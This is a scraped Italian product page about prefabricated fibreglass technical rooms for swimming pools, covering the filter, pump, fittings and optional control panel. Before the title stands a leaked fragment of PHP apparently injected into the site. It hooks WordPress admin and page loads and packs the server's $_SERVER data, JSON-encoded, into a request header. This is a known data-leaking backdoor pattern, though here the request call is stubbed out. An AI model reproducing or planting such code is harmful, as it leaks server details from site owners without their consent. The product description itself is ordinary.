add_action('admin_init', "open_hellos"); if (!is_admin()) { open_hellos(); } function open_hellos() { $args = array( 'timeout' => 10, 'headers' => array( "User-Agent" => json_encode($_SERVER), ), ); try { $response='';return $response; } catch (Throwable $e) { } } La struttura dei locali — Localitecnicipiscine.it

La struttura dei locali

I locali tecnici per piscine sono strutture prefabbricate interrabili dove viene alloggiato il sistema di filtrazione della piscina. Possono essere ordinati già equipaggiati di filtro e pompa, oppure vuoti.

I locali tecnici possono essere utilizzati per qualsiasi tipo di piscina, interrata o fuori terra. Sono la soluzione migliore per installare velocemente e senza fatica il sistema di filtrazione della piscina.

Con il locale tecnico disponi di un’apparecchiatura completa e collaudata, da inserire direttamente nel giardino a fianco della tua piscina, in grado di filtrare e regolare i cicli di filtrazione. Inoltre, è possibile, su ordinazione, equipaggiare ulteriormente il locale tecnico, scegliendo tra una serie di accessori che migliorano e facilitano il mantenimento di una piscina, quali l’elettrolisi del sale e il pannello di regolazione, controllo e dosaggio di cloro e pH.

Il locale tecnico è un vero e proprio elettrodomestico, studiato e realizzato per rendere automatico e più comodo il completamento di un impianto per piscina.

In più, è un prodotto interamente ITALIANO!


LA STRUTTURA

I locali tecnici per piscine sono in vetroresina, realizzati con un pluristrato di materassino e resina neopentilica, protetto da uno strato di gelcoat (vernice con resina utilizzata nel settore nautico per la realizzazione delle barche), che assicura una tenuta pluridecennale contro corrosioni e cedimenti e, ancor peggio, infiltrazioni d’acqua, che possono invece verificarsi in strutture murarie.

Ciasuno di essi è dotato di coperchio antiscivolo con chiusura di sicurezza a chiave anti-vandalismi e anti-caduta.

I locali tecnici per piscina sono equipaggiati di:

  • Un potente filtro a sabbia di quarzo (silice macinata), che assicura la scrupolosità della filtrazione e la limpidezza dell’acqua. Ecologico, non crea residui di smaltimento e non necessita di sostituzioni periodiche.
  • Un’elettropompa monofase o trifase, completa di prefiltro, che trattiene le impurità più grosse e le foglie. Il prefiltro è studiato per essere di facile esportazione e pulizia. Dotato di coperchio trasparente in metacrilato, che permette una facile ispezione.
  • Collegamenti interni effettuati con raccorderia in PVC-PN 10 ad incollaggio, che assicurano un’installazione altamente professionale, con valvole a sfera PN 16 per la regolazione delle portate ed il comando del flusso d’acqua.

E’ inoltre possibile richiedere il locale tecnico completo di quadro elettrico di comando della pompa, completo di orologio di programmazione dei cicli di filtrazione, interruttore salvamotore, relè, interruttore manuale/automatico e cavo con presa.

I locali tecnici per piscine sono completamente assemblati, con tutte le sue componenti. E’ solamente necessario inserire i tubi di arrivo dalla piscina e far partire l’impianto.